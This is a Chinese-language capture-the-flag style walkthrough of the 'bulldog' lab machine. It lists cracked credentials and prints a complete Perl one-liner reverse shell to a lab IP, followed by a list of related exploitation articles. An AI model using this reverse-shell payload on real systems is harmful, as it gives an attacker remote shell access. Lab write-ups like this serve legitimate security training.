逐个去破解

发现之后的密码是

sarah:bulldoglover

nick:bulldog

登录 成功之后 访问如下页面

刷新一下

use Socket;$i="192.168.232.131";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

下面是提权

bulldog漏洞利用相关推荐

  1. CORS漏洞利用检测和利用方式

    CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...

  2. 流行漏洞利用工具包瞄准Flash、Java和IE

    Digital Shadows研究了"In the Business of Exploitation"中22个漏洞利用工具包,发现共有76个被瞄准的漏洞.最常被利用的软件应该不会太 ...

  3. Flash Player漏洞利用Exploiting Flash Reliably

    以下消息来自幻影论坛[Ph4nt0m]邮件组   前两天推荐过Mark Dowd的Paper "Exploiting Flash Reliably" [url]http://hi. ...

  4. 溢出漏洞利用小结(基础)

    shell 获取小结 这里总结几种常见的获取 shell 的方式: 执行 shellcode,这一方面也会有不同的情况 可以直接返回 shell 可以将 shell 返回到某一个端口 shellcod ...

  5. 7. Vulnerability exploitation tools (漏洞利用工具 11个)

    Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...

  6. ASP.net 资源请求漏洞利用工具PadBuster

    ASP.net 资源请求漏洞利用工具PadBuster 在ASP.net 网站中,为了便于部署网站项目,开发者往往会将资源(图片.Javascript文件)嵌入到dll文件中.而网页中,会使用WebR ...

  7. ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法

    ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 参考文章: (1)ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 (2)ht ...

  8. S2-045漏洞利用工具解决方案

    S2-045漏洞利用工具&解决方案 参考文章: (1)S2-045漏洞利用工具&解决方案 (2)https://www.cnblogs.com/sevck/p/6516268.html ...

  9. WPS漏洞利用工具Bully常见命令集合

    WPS漏洞利用工具Bully常见命令集合 Bully是一款利用路由的WPS漏洞来破解WiFi密码工具.相比Reaver工具,Bully提升了资源使用效率,并提供了更丰富的设置选项.

最新文章

  1. 2020\Simulation_1\4.数字9
  2. GuGuFishtion(2018 Multi-University Training Contest 7)
  3. 我是一个硬盘(开始以为是一个笑话,看到最后会发 ...
  4. 我们如何制作xkcd样式图?
  5. 网页输入数据到mysql_为什么用PHP编写的网页中,输入的数据不能插入到Mysql数据库中?...
  6. tomcat启动报错:Address already in use: JVM_Bind
  7. 我的世界1.12.2java下载_我的世界1.12.2.2中文版下载 我的世界1.12.2.2中文版单机游戏下载...
  8. discuz tools.php,Discuz!论坛Tools工具箱功能详解
  9. 如何在SSH项目中布置多个定时任务?
  10. 记录下准备蓝桥杯的过程吧
  11. java实现12306查票_GitHub - HendSame/J12306: 12306抢票程序JAVA版
  12. 泰山OFFICE技术讲座:标点关系穷举研究-03
  13. SQL获取某月第一天或最后一天
  14. 星河万里 一路“童”行
  15. Unity 3D 游戏编程设计g03
  16. 苹果原壁纸高清_精选创意设计系列高清苹果手机壁纸
  17. oracle数据库字符集子集与超集对应关系表表
  18. 图解Semaphore信号量之AQS共享锁-非公平模式
  19. 学习笔记(15):R语言入门基础-增加行或列
  20. JavaScript 个人笔记3(详细BOMDOM)

热门文章

  1. 【毕设】通过RGB识别红外图像火点(matlab)
  2. 字节跳动 Java 岗一二三面全经过分享
  3. 矩阵分析:Kronecker积,Hadamard积
  4. 华为交换机:利用Excel转换MAC地址公式
  5. 关于抽象类的实验(java 内部类、多态等练习)
  6. NFS服务配置与mount nfs时-o nolock的问题
  7. 计算机知识竞赛赛制,知识竞赛活动规则
  8. 数据外泄保护与国土安全部
  9. C#List子类转List父类或者Obj对象转List
  10. Error:java: 读取xxx.jar时出错; zip file is empty